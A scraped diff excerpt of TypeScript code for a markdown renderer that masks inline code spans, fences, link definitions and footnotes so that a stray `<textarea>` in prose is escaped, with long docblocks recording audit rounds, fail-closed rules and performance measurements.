function findInlineCodeRanges(source: string): Array<[number, number]> {
|
|
656
|
+
const ranges: Array<[number, number]> = []
|
|
657
|
+
const len = source.length
|
|
658
|
+
let pos = 0
|
|
659
|
+
while (pos <= len) {
|
|
660
|
+
// Grow one PARAGRAPH SEGMENT: the maximal run of non-blank lines starting
|
|
661
|
+
// at or after `pos`. `segStart`/`segEnd` bound it; blank lines never enter.
|
|
662
|
+
let segStart = -1
|
|
663
|
+
let segEnd = -1
|
|
664
|
+
while (pos <= len) {
|
|
665
|
+
let end = source.indexOf('\n', pos)
|
|
666
|
+
if (end === -1) end = len
|
|
667
|
+
const blank = isBlankLine(source.slice(pos, end))
|
|
668
|
+
if (blank && segStart !== -1) break
|
|
669
|
+
if (!blank) {
|
|
670
|
+
if (segStart === -1) segStart = pos
|
|
671
|
+
segEnd = end
|
|
672
|
+
}
|
|
673
|
+
pos = end === len ? len + 1 : end + 1
|
|
674
|
+
}
|
|
675
|
+
if (segStart === -1) break
|
|
676
|
+
const lineStart = segStart
|
|
677
|
+
const lineEnd = segEnd
|
|
678
|
+
const runStart: number[] = []
|
|
679
|
+
const runLen: number[] = []
|
|
680
|
+
for (let i = lineStart; i < lineEnd; i++) {
|
|
681
|
+
if (source.charCodeAt(i) !== BACKTICK_CODE) continue
|
|
682
|
+
let j = i + 1
|
|
683
|
+
while (j < lineEnd && source.charCodeAt(j) === BACKTICK_CODE) j++
|
|
684
|
+
runStart.push(i)
|
|
685
|
+
runLen.push(j - i)
|
|
686
|
+
i = j - 1
|
|
687
|
+
}
|
|
688
|
+
const n = runStart.length
|
|
689
|
+
if (n > 0) {
|
|
690
|
+
// suffMax[t] = longest run at or after t; 0 past the end.
|
|
691
|
+
const suffMax = new Array<number>(n + 1).fill(0)
|
|
692
|
+
for (let t = n - 1; t >= 0; t--) suffMax[t] = Math.max(runLen[t], suffMax[t + 1])
|
|
693
|
+
let cursor = lineStart
|
|
694
|
+
let idx = 0
|
|
695
|
+
while (idx < n) {
|
|
696
|
+
const runEnd = runStart[idx] + runLen[idx]
|
|
697
|
+
// The scan resumes at the END of the previous match, which can land
|
|
698
|
+
// MID-RUN — exactly as the global regex's `lastIndex` did. The
|
|
699
|
+
// REMAINDER of the run is then an opener in its own right (`` `a`` ``
|
|
700
|
+
// matches twice), so clamp rather than skip.
|
|
701
|
+
if (runEnd <= cursor) {
|
|
702
|
+
idx++
|
|
703
|
+
continue
|
|
704
|
+
}
|
|
705
|
+
const p = Math.max(runStart[idx], cursor)
|
|
706
|
+
const openLen = runEnd - p
|
|
707
|
+
// Largest closer length reachable via a LATER run, and via THIS one.
|
|
708
|
+
const kLater = Math.min(openLen, suffMax[idx + 1])
|
|
709
|
+
const kSame = openLen >> 1
|
|
710
|
+
const k = Math.max(kLater, kSame)
|
|
711
|
+
// No match is possible only when this is the last run and it is a
|
|
712
|
+
// single backtick — every longer run closes on itself, so advancing by
|
|
713
|
+
// one character (what the regex does) cannot find one either.
|
|
714
|
+
if (k < 1) {
|
|
715
|
+
cursor = runEnd
|
|
716
|
+
idx++
|
|
717
|
+
continue
|
|
718
|
+
}
|
|
719
|
+
let q = kSame >= k ? p + k : -1
|
|
720
|
+
if (q === -1)
|
|
721
|
+
for (let t = idx + 1; t < n; t++)
|
|
722
|
+
if (runLen[t] >= k) {
|
|
723
|
+
q = runStart[t]
|
|
724
|
+
break
|
|
725
|
+
}
|
|
726
|
+
ranges.push([p, q + k])
|
|
727
|
+
cursor = q + k
|
|
728
|
+
}
|
|
729
|
+
}
|
|
730
|
+
}
|
|
731
|
+
return ranges
|
|
732
|
+
}
|
|
733
|
+
|
|
734
|
+
/** Exported for the differential fuzz against the retired regex. */
|
|
735
|
+
export const __findInlineCodeRangesForTest = findInlineCodeRanges
|
|
736
|
+
|
|
737
|
+
/**
|
|
738
|
+
* ASCII-ONLY case fold. `String.prototype.toLowerCase()` is NOT
|
|
739
|
+
* length-preserving: U+0130 (Turkish dotted capital `İ`) expands to `i` +
|
|
740
|
+
* U+0307 (1 code unit → 2). It is the only BMP character that does so, and it
|
|
741
|
+
* is ordinary Turkish prose (`İstanbul`, `İzmir`) — so a message with enough
|
|
742
|
+
* of them ahead of a `<textarea>` shifted the whole haystack later than the
|
|
743
|
+
* `segmentOffset + index + match.length` the caller computes from the ORIGINAL
|
|
744
|
+
* text, `hasLaterCloser` began scanning in a window strictly BEFORE the
|
|
745
|
+
* opener, matched an already-consumed `</textarea>`, and left the opener LIVE
|
|
746
|
+
* — reopening the RAWTEXT swallow the mask exists to close.
|
|
747
|
+
*
|
|
748
|
+
* Tag names are ASCII by definition (`TAG_LIKE_REGEX` only matches
|
|
749
|
+
* `[a-zA-Z][a-zA-Z0-9-]*`), so folding ASCII alone loses nothing.
|
|
750
|
+
* `buildCloserHaystack(src).length === src.length` is asserted over the whole
|
|
751
|
+
* fixture corpus in the parity test — that invariant is the actual guard.
|
|
752
|
+
*/
|
|
753
|
+
function foldAsciiCase(text: string): string {
|
|
754
|
+
return text.replace(/[A-Z]/g, (c) => String.fromCharCode(c.charCodeAt(0) + 32))
|
|
755
|
+
}
|
|
756
|
+
|
|
757
|
+
/**
|
|
758
|
+
* ---------------------------------------------------------------------------
|
|
759
|
+
* MASK-ONLY code-region blanking (never the carve)
|
|
760
|
+
* ---------------------------------------------------------------------------
|
|
761
|
+
* All of the blanking passes below share one contract:
|
|
762
|
+
*
|
|
763
|
+
* - they SCAN `source` (the folded but otherwise unmasked copy) and APPLY the
|
|
764
|
+
* resulting ranges to `masked`. That split is LOAD-BEARING: the inline-code
|
|
765
|
+
* pass chews a pair of backticks off an unclosed ```` ``` ```` opener (the
|
|
766
|
+
* opener run gives back backticks until a single one matches the next one as
|
|
767
|
+
* its closer), so a fence scan over the masked copy sees no fence at all. Both
|
|
768
|
+
* strings have identical indices, so offsets transfer verbatim.
|
|
769
|
+
* `blankComments` is the ONE deliberate exception (it is fed the masked
|
|
770
|
+
* copy, and runs last) — see its docblock for why the reasoning inverts.
|
|
771
|
+
* - they are LENGTH-PRESERVING (every non-newline char in a range becomes a
|
|
772
|
+
* space), because `escapeOutsideFences` indexes the mask with offsets it
|
|
773
|
+
* computed from the ORIGINAL text.
|
|
774
|
+
* - they fail CLOSED. Blanking too much can only make `hasLaterCloser` return
|
|
775
|
+
* false, i.e. ESCAPE a RAWTEXT opener that could have stayed live; blanking
|
|
776
|
+
* too little leaves a prose `<textarea>` live and lets parse5 swallow the
|
|
777
|
+
* rest of the message. Every approximation here therefore rounds towards
|
|
778
|
+
* blanking.
|
|
779
|
+
*
|
|
780
|
+
* ---------------------------------------------------------------------------
|
|
781
|
+
* THE SAFETY CLAIM IS LINE COVERAGE, NOT PASS COMPOSITION (round 18)
|
|
782
|
+
* ---------------------------------------------------------------------------
|
|
783
|
+
* Round 17 claimed this class was "closed by proof" and offered a PASS CALL
|
|
784
|
+
* MATRIX — which pass invokes which — as the proof. That was the wrong
|
|
785
|
+
* property, and round 18 found the eighth instance anyway. The matrix shows the
|
|
786
|
+
* passes COMPOSE SYMMETRICALLY; it says nothing about whether every line of the
|
|
787
|
+
* document is actually EXAMINED. Round 18's defect lived inside a pass that the
|
|
788
|
+
* matrix lists as present and symmetric (`blankListItemCode` calls and is called
|
|
789
|
+
* by `blankQuotedCode`): the pass simply never put the LIST-MARKER LINE into any
|
|
790
|
+
* run, so that one line was examined by nobody. A symmetric call graph over an
|
|
791
|
+
* incomplete line set is still incomplete. Do not restate the matrix as the
|
|
792
|
+
* safety argument.
|
|
793
|
+
*
|
|
794
|
+
* ---------------------------------------------------------------------------
|
|
795
|
+
* THE TABLE IS THE AUDITABLE ARTIFACT — AND TWO OF ITS ENTRIES WERE FALSE
|
|
796
|
+
* ---------------------------------------------------------------------------
|
|
797
|
+
* Round 19 audited the table below rather than the code, and found two entries
|
|
798
|
+
* literally untrue. Both were LOAD-BEARING: the `blankListItemCode` entry
|
|
799
|
+
* justified a `top >= 4` gate that hid three live instances (narrow `- ` / `1. `
|
|
800
|
+
* marker lines), and the `blankLinkDefinitions` entry's "absorbs … ONE list
|
|
801
|
+
* marker" justified never re-cutting nested markers. A table entry that is not
|
|
802
|
+
* LITERALLY TRUE is worse than no table: it converts an unexamined line into a
|
|
803
|
+
* documented decision. When you change a pass, restate what it NOW claims and
|
|
804
|
+
* re-derive every other entry from the code — do not copy the previous wording
|
|
805
|
+
* forward.
|
|
806
|
+
*
|
|
807
|
+
* THE INVARIANT THAT ACTUALLY MATTERS:
|
|
808
|
+
*
|
|
809
|
+
* For every line L of the document and every block-level construct that can
|
|
810
|
+
* OPEN on L, some pass must examine L at L's own CONTENT COLUMN — the column
|
|
811
|
+
* at which CommonMark itself would begin parsing L, after every enclosing
|
|
812
|
+
* container prefix (blockquote markers, list-item content columns) has been
|
|
813
|
+
* consumed. "Examined" means the line is a member of that pass's scanned run,
|
|
814
|
+
* cut at that column; being merely SKIPPED OVER while state is updated does
|
|
815
|
+
* not count. Constructs that are not line-anchored at all (inline code spans,
|
|
816
|
+
* HTML comments, link reference definitions, inline link/image payloads) are
|
|
817
|
+
* covered instead by a CONTAINER-AGNOSTIC pass that runs once over the whole
|
|
818
|
+
* document.
|
|
819
|
+
*
|
|
820
|
+
* AND: every region that CommonMark turns into an ATTRIBUTE OR AN IDENTIFIER
|
|
821
|
+
* rather than document text is a shelter of the same kind, whether or not it
|
|
822
|
+
* is line-anchored. A reference definition's destination/title and an INLINE
|
|
823
|
+
* link's destination/title are the same thing to remark — both become
|
|
824
|
+
* href/title and never appear as HTML — so both need a pass. Round 19 found
|
|
825
|
+
* the inline half entirely uncovered; it then implemented that generalization
|
|
826
|
+
* for only the PARENTHESISED half of the constructs the generalization names,
|
|
827
|
+
* and round 20 found the BRACKETED half — an image's alt, a reference label, a
|
|
828
|
+
* footnote label — uncovered in exactly the same way.
|
|
829
|
+
*
|
|
830
|
+
* So the checklist for a newly supported construct is: which of its text does
|
|
831
|
+
* remark consume into an attribute or an identifier — INCLUDING bracket text
|
|
832
|
+
* under `!` and reference/footnote labels — rather than emit as document HTML?
|
|
833
|
+
* Every such region needs a pass. The complement matters just as much: text
|
|
834
|
+
* remark DOES emit (an inline link's `[…]`, a bare shortcut reference's
|
|
835
|
+
* `[…]`) must stay VISIBLE, because a closer written there is real.
|
|
836
|
+
*
|
|
837
|
+
* AND: a length cap or a parse failure inside any of these passes must BLANK,
|
|
838
|
+
* never SKIP. `-1`-on-cap is the fail-OPEN shape `ba4a526b` closed for
|
|
839
|
+
* over-cap inline code spans and round 20 found reintroduced in
|
|
840
|
+
* `parseInlineLinkPayload` and the link-definition regexes. A cap is a
|
|
841
|
+
* BLANKING BOUNDARY: blank up to it. Only a genuinely unparseable SHAPE may
|
|
842
|
+
* decline, and only because remark will not read it as a link either.
|
|
843
|
+
*
|
|
844
|
+
* THAT RULE WAS STATED AND NOT STRUCTURALLY ENFORCED, so every new parser
|
|
845
|
+
* re-litigated it and sometimes lost: `ba4a526b` (over-cap code spans), round
|
|
846
|
+
* 20 (payload + definition CAPS), round 21 (the definition SHAPES the same
|
|
847
|
+
* round left behind). It is now enforced by SHAPE rather than by discipline —
|
|
848
|
+
* the container-agnostic passes have exactly TWO stages, and the stage
|
|
849
|
+
* decides the fail direction:
|
|
850
|
+
*
|
|
851
|
+
* RECOGNITION — "is this the construct at all?" MAY decline, and must,
|
|
852
|
+
* because every recognition decline is a spelling CommonMark ALSO refuses:
|
|
853
|
+
* remark emits the text as HTML, so a closer written in it is REAL and
|
|
854
|
+
* blanking it would over-escape a genuine element.
|
|
855
|
+
*
|
|
856
|
+
* CONSUMPTION — "the construct was recognized" may NEVER decline. Every
|
|
857
|
+
* give-up routes through ONE channel per pass, whose DEFAULT is blanking to
|
|
858
|
+
* the construct's CommonMark bound (the next blank line):
|
|
859
|
+
* `blankInlineLinkPayloads` → `paragraphEnd`, `blankLinkDefinitions` →
|
|
860
|
+
* `blankLinesToParagraphBound`. A pass cannot "forget" to blank, because
|
|
861
|
+
* the give-up path IS the blanking path; there is no `return -1` reachable
|
|
862
|
+
* after commitment.
|
|
863
|
+
*
|
|
864
|
+
* EXIT-PATH TABLE — every exit of the FOUR passes that can decline,
|
|
865
|
+
* classified. Keep it accurate when you touch them; an unclassified exit is
|
|
866
|
+
* the next instance.
|
|
867
|
+
*
|
|
868
|
+
* THE RULE THAT PRODUCED THIS ROUND: A NEW PASS MUST LAND IN BOTH TABLES —
|
|
869
|
+
* this one and "WHICH LINES EACH PASS CLAIMS" below — IN THE SAME COMMIT.
|
|
870
|
+
* Round 22 added `blankUnreferencedFootnotes` to the pipeline with an entry in
|
|
871
|
+
* NEITHER, and it is the pass that shipped a live fail-open (round 23: PASS 1
|
|
872
|
+
* counted PHANTOM references, so a definition holding a `</textarea>` stayed
|
|
873
|
+
* in the haystack and the opener above it stayed live, in ten spellings).
|
|
874
|
+
* These two tables have caught six literally-false or missing claims across
|
|
875
|
+
* six rounds; they are the instrument, and the round that skipped them is the
|
|
876
|
+
* round that regressed. Filling them in is not documentation, it is the audit.
|
|
877
|
+
*
|
|
878
|
+
* blankLinkDefinitions
|
|
879
|
+
* R no `[` on the line / `LINK_DEF_OPEN_RE` fails → not a definition line.
|
|
880
|
+
* R `\[^` (GFM footnote), REFERENCED → BLOCK-parsed body, may
|
|
881
|
+
* hold real HTML (r19).
|
|
882
|
+
* Only when the label is
|
|
883
|
+
* REFERENCED: r22 found
|
|
884
|
+
* the decline fail-OPEN
|
|
885
|
+
* for the unreferenced
|
|
886
|
+
* case, which
|
|
887
|
+
* `blankUnreferencedFootnotes`
|
|
888
|
+
* now blanks whole.
|
|
889
|
+
* R `findLabelClose`: `]` not followed by `:` → shortcut reference or
|
|
890
|
+
* plain text; remark
|
|
891
|
+
* EMITS it (the same
|
|
892
|
+
* exclusion
|
|
893
|
+
* `blankBracketLabels`
|
|
894
|
+
* documents).
|
|
895
|
+
* R `findLabelClose`: unescaped `[` in the label → CommonMark rejects the
|
|
896
|
+
* label → paragraph text.
|
|
897
|
+
* R `findLabelClose`: paragraph bound, no `]:` → an ordinary
|
|
898
|
+
* `[`-leading prose
|
|
899
|
+
* paragraph.
|
|
900
|
+
* R `parseDestOnLine` -1 (angle dest unclosed) → no line ending allowed
|
|
901
|
+
* in `<…>`, and a bare
|
|
902
|
+
* dest may not start with
|
|
903
|
+
* `<` → not a definition.
|
|
904
|
+
* R `parseDefTail`/`parseTitleTail` `decline` → trailing content, or a
|
|
905
|
+
* title neither
|
|
906
|
+
* space-separated nor
|
|
907
|
+
* delimiter-opened →
|
|
908
|
+
* remark reads a
|
|
909
|
+
* PARAGRAPH. On the
|
|
910
|
+
* OPENER line this
|
|
911
|
+
* unwinds the WHOLE
|
|
912
|
+
* construct (nothing is
|
|
913
|
+
* blanked). On a
|
|
914
|
+
* CONTINUATION line it
|
|
915
|
+
* splits in TWO, and the
|
|
916
|
+
* old single sentence
|
|
917
|
+
* was true of only one
|
|
918
|
+
* (r22):
|
|
919
|
+
* · after `needTitle`
|
|
920
|
+
* the definition WAS
|
|
921
|
+
* already complete
|
|
922
|
+
* (a title is
|
|
923
|
+
* optional), so
|
|
924
|
+
* stopping is exact;
|
|
925
|
+
* · after `needDest`
|
|
926
|
+
* it was NOT — with
|
|
927
|
+
* no parseable
|
|
928
|
+
* destination remark
|
|
929
|
+
* reads the whole run
|
|
930
|
+
* as a PARAGRAPH —
|
|
931
|
+
* and lines
|
|
932
|
+
* `i..close.line`
|
|
933
|
+
* are ALREADY blanked
|
|
934
|
+
* by the committed
|
|
935
|
+
* loop. So this exit
|
|
936
|
+
* OVER-blanks the
|
|
937
|
+
* label lines; safe
|
|
938
|
+
* because
|
|
939
|
+
* over-blanking only
|
|
940
|
+
* hides closers.
|
|
941
|
+
* C `openTitle` (title opens, never closes) → BLANK to the paragraph
|
|
942
|
+
* bound.
|
|
943
|
+
* C end of `lines` / blank line while continuing → everything up to the
|
|
944
|
+
* bound is already
|
|
945
|
+
* blanked.
|
|
946
|
+
* (no length cap exists in this pass at all)
|
|
947
|
+
*
|
|
948
|
+
* blankInlineLinkPayloads / parseInlineLinkPayload
|
|
949
|
+
* C `q >= limit`, input REMAINS past the cap → returns `limit`, and
|
|
950
|
+
* the caller widens to
|
|
951
|
+
* `paragraphEnd` (r20).
|
|
952
|
+
* R `q >= limit` because the INPUT IS EXHAUSTED → returns -1. Nothing
|
|
953
|
+
* closes the payload and
|
|
954
|
+
* nothing will, so remark
|
|
955
|
+
* reads text too. Split
|
|
956
|
+
* out in r22: it used to
|
|
957
|
+
* share the cap exit, so
|
|
958
|
+
* the ordinary STREAMING
|
|
959
|
+
* tail `see [a](/x`
|
|
960
|
+
* blanked its paragraph
|
|
961
|
+
* and flickered.
|
|
962
|
+
* R angle dest not closed before `\n`/end → CommonMark forbids a
|
|
963
|
+
* line ending in `<…>`.
|
|
964
|
+
* R bare dest with unbalanced `(` → not a link → text.
|
|
965
|
+
* R no `)` where the payload must end → not a link → text.
|
|
966
|
+
* - `s[q] !== close` after the title loop → UNREACHABLE: the loop
|
|
967
|
+
* exits only on the
|
|
968
|
+
* closer or on `q >=
|
|
969
|
+
* limit`, and the latter
|
|
970
|
+
* returns `overflow`
|
|
971
|
+
* first.
|
|
972
|
+
*
|
|
973
|
+
* blankUnreferencedFootnotes (round 23 — the entry round 22 never wrote)
|
|
974
|
+
* R `masked.indexOf('[^') === -1` (whole-pass skip) → the document contains
|
|
975
|
+
* no footnote SPELLING at
|
|
976
|
+
* all, so there is nothing
|
|
977
|
+
* to blank. Exact.
|
|
978
|
+
* R `FOOTNOTE_DEF_OPEN_RE` fails / no `:` after the
|
|
979
|
+
* label / `footnoteLabelEnd` -1 on the OPENER → not a definition line;
|
|
980
|
+
* remark reads a paragraph
|
|
981
|
+
* and any closer on it is
|
|
982
|
+
* REAL.
|
|
983
|
+
* R label IS referenced (in the REF-MASK) → round 19's case:
|
|
984
|
+
* remark keeps the
|
|
985
|
+
* definition, its body is
|
|
986
|
+
* BLOCK-parsed and may
|
|
987
|
+
* hold real HTML.
|
|
988
|
+
* C `footnoteLabelEnd === -1` mid-line → `break` → abandons the REST OF
|
|
989
|
+
* THE LINE's references.
|
|
990
|
+
* Fail-CLOSED (fewer
|
|
991
|
+
* references ⇒ more
|
|
992
|
+
* definitions blanked),
|
|
993
|
+
* but note the shape it
|
|
994
|
+
* gives up on: a line
|
|
995
|
+
* `[^x[ … [^f]` silently
|
|
996
|
+
* stops counting at the
|
|
997
|
+
* voided label, so a REAL
|
|
998
|
+
* `[^f]` after it can be
|
|
999
|
+
* missed and its
|
|
1000
|
+
* definition over-blanked
|
|
1001
|
+
* into escaped source
|
|
1002
|
+
* (cosmetic).
|
|
1003
|
+
* C body walk `break` on a SECOND definition line → the body ended; the
|
|
1004
|
+
* neighbour is blanked (or
|
|
1005
|
+
* not) on its OWN merits.
|
|
1006
|
+
* C body walk `break` on a de-indented line after a
|
|
1007
|
+
* blank one → GFM's own body bound.
|
|
1008
|
+
* (both body `break`s only SHORTEN the blanked range, i.e. leave MORE
|
|
1009
|
+
* haystack visible — the same direction as declining the definition
|
|
1010
|
+
* entirely, which is round 19's shipped behaviour, never a new hole)
|
|
1011
|
+
* (no length cap exists in this pass at all)
|
|
1012
|
+
*
|
|
1013
|
+
* blankBracketLabels
|
|
1014
|
+
* R no `[` in the document → no bracket construct.
|
|
1015
|
+
* R `]` with an empty stack → closes nothing.
|
|
1016
|
+
* - no length cap and no parse that can fail: the walk is total over the
|
|
1017
|
+
* document and crosses newlines, so it has NO give-up path to classify.
|
|
1018
|
+
*
|
|
1019
|
+
* WHICH LINES EACH PASS CLAIMS, AND AT WHAT COLUMN:
|
|
1020
|
+
*
|
|
1021
|
+
* findInlineCodeRanges — EVERY line, at column 0 of its PARAGRAPH SEGMENT
|
|
1022
|
+
* (a maximal run of non-blank lines). Container-agnostic: backtick runs are
|
|
1023
|
+
* matched with no column or prefix anchoring, so a `> ` / indent prefix is
|
|
1024
|
+
* ordinary text between ticks. Spans CROSS line breaks (round 18) and stop
|
|
1025
|
+
* at a paragraph break, which is exactly CommonMark's bound.
|
|
1026
|
+
* blankFencedRegions — every line of the run it is GIVEN, at that run's
|
|
1027
|
+
* column (the caller cut it). Absolute-column-limited by `FENCE_RE`'s 0..3
|
|
1028
|
+
* indent cap, which is WHY the container passes must re-cut and re-run it.
|
|
1029
|
+
* blankIndentedCode — every line of the run it is given, at that run's
|
|
1030
|
+
* column, with a list-content-column stack for the +4 threshold.
|
|
1031
|
+
* blankLinkDefinitions — EVERY line, in TWO dimensions that must both be
|
|
1032
|
+
* stated, because round 21 found the entry true of the first and silently
|
|
1033
|
+
* false of the second.
|
|
1034
|
+
* COLUMN: at column 0 AND at the column its own prefix reaches.
|
|
1035
|
+
* `LINK_DEF_CONTAINER_PREFIX` absorbs a blockquote run and AT MOST ONE
|
|
1036
|
+
* list marker, so the top-level call covers a definition at nesting depth
|
|
1037
|
+
* 0 or 1 directly. DEEPER nesting (`- - [a]: …`) is NOT covered by the
|
|
1038
|
+
* top-level call — round 19's corrected entry — and is reached only
|
|
1039
|
+
* because both container passes re-run this pass on their stripped runs,
|
|
1040
|
+
* and `blankListItemCode` re-cuts nested markers by recursing into
|
|
1041
|
+
* ITSELF. That re-cut is load-bearing, not redundancy.
|
|
1042
|
+
* SHAPE: what the label, destination and title may CONTAIN — the
|
|
1043
|
+
* dimension the old wording never mentioned, so five ESCAPED-delimiter
|
|
1044
|
+
* spellings and five MULTI-LINE spellings were "covered" by an entry that
|
|
1045
|
+
* had not examined them. The pass is now a CHARACTER PARSER, not a line
|
|
1046
|
+
* regex: `\` + one character is consumed as a unit EVERYWHERE (so a
|
|
1047
|
+
* title may hold `\"` / `\'` / `\)` and a label `\]`), the LABEL may
|
|
1048
|
+
* span lines up to the paragraph bound, and an unterminated TITLE is
|
|
1049
|
+
* blanked to that same bound. There is no length cap of any kind. What it
|
|
1050
|
+
* does NOT claim, and why, is on the exits themselves (see below).
|
|
1051
|
+
* blankUnreferencedFootnotes — EVERY line, container-agnostic and at ANY
|
|
1052
|
+
* depth: `FOOTNOTE_DEF_OPEN_RE`'s own prefix absorbs a blockquote run plus
|
|
1053
|
+
* ANY NUMBER of list markers, so unlike `blankLinkDefinitions` this pass
|
|
1054
|
+
* needs no container re-cut — and could not use one, because its reference
|
|
1055
|
+
* set is document-GLOBAL and a stripped run cannot see it. Exactly ONE
|
|
1056
|
+
* top-level call. No length cap of any kind.
|
|
1057
|
+
* IT READS TWO SOURCES, and that split is the security-load-bearing part
|
|
1058
|
+
* (round 23):
|
|
1059
|
+
* DEFINITIONS from the current MASK — a definition an earlier pass hid is
|
|
1060
|
+
* not blanked, which leaves it in the haystack (round 19's direction).
|
|
1061
|
+
* REFERENCES from a SEPARATE, MORE-BLANKED copy (`footnoteReferenceMask`),
|
|
1062
|
+
* because every region remark consumes into an ATTRIBUTE or drops — image
|
|
1063
|
+
* alt, full-reference label, inline link title / angle destination, HTML
|
|
1064
|
+
* comment, raw HTML block, inline tag attribute, autolink — yields a
|
|
1065
|
+
* PHANTOM reference, and a phantom keeps a dropped definition (and its
|
|
1066
|
+
* `</textarea>`) in the haystack: fail-OPEN, reproduced live in ten
|
|
1067
|
+
* spellings. Counting FEWER references only blanks MORE, so that copy may
|
|
1068
|
+
* over-blank freely.
|
|
1069
|
+
* CLAIMED BODY: the label line, its lazy paragraph continuations, and
|
|
1070
|
+
* further blocks indented >= 4 columns past the blockquote run.
|
|
1071
|
+
* blankInlineLinkPayloads — EVERY inline link/image payload in the document,
|
|
1072
|
+
* container-agnostic: the scan is anchored on the `](` bigram with no column
|
|
1073
|
+
* or prefix anchoring, so a container prefix is ordinary text ahead of it.
|
|
1074
|
+
* Claims ONLY the `(…)` payload — never the `[…]` text of an INLINE LINK,
|
|
1075
|
+
* which is inline-parsed and reaches the document as HTML. Its cap
|
|
1076
|
+
* (`INLINE_LINK_PAYLOAD_MAX`) BLANKS THROUGH rather than declining; only an
|
|
1077
|
+
* unparseable SHAPE declines (round 20).
|
|
1078
|
+
* blankBracketLabels — EVERY `[…]` group in the document whose text remark
|
|
1079
|
+
* consumes into an attribute or an identifier: an image's alt (`[` preceded
|
|
1080
|
+
* by `!`), the second group of a `][` adjacency (a full reference's label),
|
|
1081
|
+
* the first group of a `][]` adjacency (a collapsed reference's identifier),
|
|
1082
|
+
* and a footnote label (`[^…]`, reference AND definition). Container-
|
|
1083
|
+
* agnostic: one left-to-right bracket walk, no column or prefix anchoring.
|
|
1084
|
+
* Claims NEITHER an inline link's `[…]` NOR a bare shortcut reference's —
|
|
1085
|
+
* remark emits both as HTML, so a closer there is real (round 20). The
|
|
1086
|
+
* `][` / `][]` adjacency is compared PER NESTING DEPTH (round 23 — a single
|
|
1087
|
+
* `prev` let a nested group clobber the sibling it had to be compared with,
|
|
1088
|
+
* so `[txt][[^f]]`'s label was never claimed). Its ONE option,
|
|
1089
|
+
* `{ footnoteLabels: false }`, is for `footnoteReferenceMask` only.
|
|
1090
|
+
* blankComments — EVERY line, container-agnostic: `HTML_COMMENT_RE` is
|
|
1091
|
+
* `[\s\S]`-based and anchored nowhere, so a comment matches straight through
|
|
1092
|
+
* any prefix. Runs LAST, over the masked copy (see its docblock).
|
|
1093
|
+
* blankQuotedCode — supplies runs cut at the BLOCKQUOTE content column,
|
|
1094
|
+
* for every maximal run of quote-prefixed lines, INCLUDING the line that
|
|
1095
|
+
* opens the quote (the prefix regex matches it like any other).
|
|
1096
|
+
* blankListItemCode — supplies runs cut at the LIST-ITEM content column
|
|
1097
|
+
* for EVERY line inside a list item at ANY content column >= 1 (round 19 —
|
|
1098
|
+
* the gate used to be `>= 4` on the claim that "below column 4 the top-level
|
|
1099
|
+
* passes already cover the line at the right column", which is true of a
|
|
1100
|
+
* CONTINUATION line and FALSE of the MARKER line: at content column 2 or 3
|
|
1101
|
+
* the marker line is examined only at column 0, where the leading `- ` /
|
|
1102
|
+
* `1. ` is not whitespace and `FENCE_RE` cannot match). Includes THE MARKER
|
|
1103
|
+
* LINE ITSELF (round 18) and re-cuts NESTED markers by recursing into itself
|
|
1104
|
+
* (round 19), since `LIST_MARKER_RE` matches only the FIRST marker on a
|
|
1105
|
+
* line.
|
|
1106
|
+
*
|
|
1107
|
+
* The two container passes call each other AND `blankListItemCode` calls itself,
|
|
1108
|
+
* and all of them call the fence + indented + link-definition passes, so a line
|
|
1109
|
+
* nested in any order and any DEPTH of containers is eventually cut to its own
|
|
1110
|
+
* content column. That composition is a MEANS to the invariant above, not a
|
|
1111
|
+
* substitute for it. When adding a pass or a container, the question to answer
|
|
1112
|
+
* is "which lines does it claim, at which column, and is any line now claimed by
|
|
1113
|
+
* nobody" — not "does the call graph look symmetric".
|
|
1114
|
+
*/
|
|
1115
|
+
|
|
1116
|
+
/**
|
|
1117
|
+
* Length-preserving blank of MANY ranges in one pass. Ranges must be
|
|
1118
|
+
* non-overlapping and ascending.
|
|
1119
|
+
*
|
|
1120
|
+
* THE ONLY BLANKING PRIMITIVE (round 18 — performance). There used to be a
|
|
1121
|
+
* single-range `blankRange` beside it, and `blankIndentedCode` /
|
|
1122
|
+
* `blankFencedRegions` / `blankComments` each folded the document through it
|
|
1123
|
+
* ONCE PER LINE OR REGION. Every call rebuilds the entire string, so masking an
|
|
1124
|
+
* all-indented-code document was QUADRATIC — measured on
|
|
1125
|
+
* `__buildCloserHaystackForTest`: 37 KB → 6 ms, 151 KB → 178 ms, 389 KB →
|
|
1126
|
+
* 1127 ms, 989 KB → 3753 ms (2.5x input ⇒ ~6x time), and the two container
|
|
1127
|
+
* passes re-run both over every nested run, multiplying the constant. A ~400 KB
|
|
1128
|
+
* KB article or release-notes page — all of which go through this renderer —
|
|
1129
|
+
* blocked the main thread for over a second. Every pass now COLLECTS ranges and
|
|
1130
|
+
* applies them here exactly once, which is what the inline pass already did.
|
|
1131
|
+
* After, same four sizes and same harness: 2 ms / 5 ms / 12 ms / 28 ms — dead
|
|
1132
|
+
* linear at ~28 ns/char, a 134x improvement at 989 KB.
|
|
1133
|
+
*
|
|
1134
|
+
* Do not reintroduce a per-range helper; a pass that blanks in a loop is the
|
|
1135
|
+
* regression.
|
|
1136
|
+
*/
|
|
1137
|
+
function blankRanges(masked: string, ranges: Array<[number, number]>): string {
|
|
1138
|
+
if (ranges.length === 0) return masked
|
|
1139
|
+
const parts: string[] = []
|
|
1140
|
+
let cursor = 0
|
|
1141
|
+
for (const [from, to] of ranges) {
|
|
1142
|
+
parts.push(masked.slice(cursor, from), masked.slice(from, to).replace(/[^\n]/g, ' '))
|
|
1143
|
+
cursor = to
|
|
1144
|
+
}
|
|
1145
|
+
parts.push(masked.slice(cursor))
|
|
1146
|
+
return parts.join('')
|
|
1147
|
+
}
|
|
1148
|
+
|
|
1149
|
+
/** One scannable line: where it starts, and (for container-nested scans) where
|
|
1150
|
+
* its scanned content starts once the container prefix is stripped. */
|
|
1151
|
+
interface MaskLine {
|
|
1152
|
+
start: number
|
|
1153
|
+
contentStart: number
|
|
1154
|
+
content: string
|
|
1155
|
+
}
|
|
1156
|
+
|
|
1157
|
+
function toMaskLines(source: string): MaskLine[] {
|
|
1158
|
+
const out: MaskLine[] = []
|
|
1159
|
+
let offset = 0
|
|
1160
|
+
for (const line of source.split('\n')) {
|
|
1161
|
+
out.push({ start: offset, contentStart: offset, content: line })
|
|
1162
|
+
offset += line.length + 1
|
|
1163
|
+
}
|
|
1164
|
+
return out
|
|
1165
|
+
}
|
|
1166
|
+
|
|
1167
|
+
/**
|
|
1168
|
+
* Blank every FENCED region in a line run, using the real CommonMark fence
|
|
1169
|
+
* state machine (`createFenceTracker`) rather than a regex.
|
|
1170
|
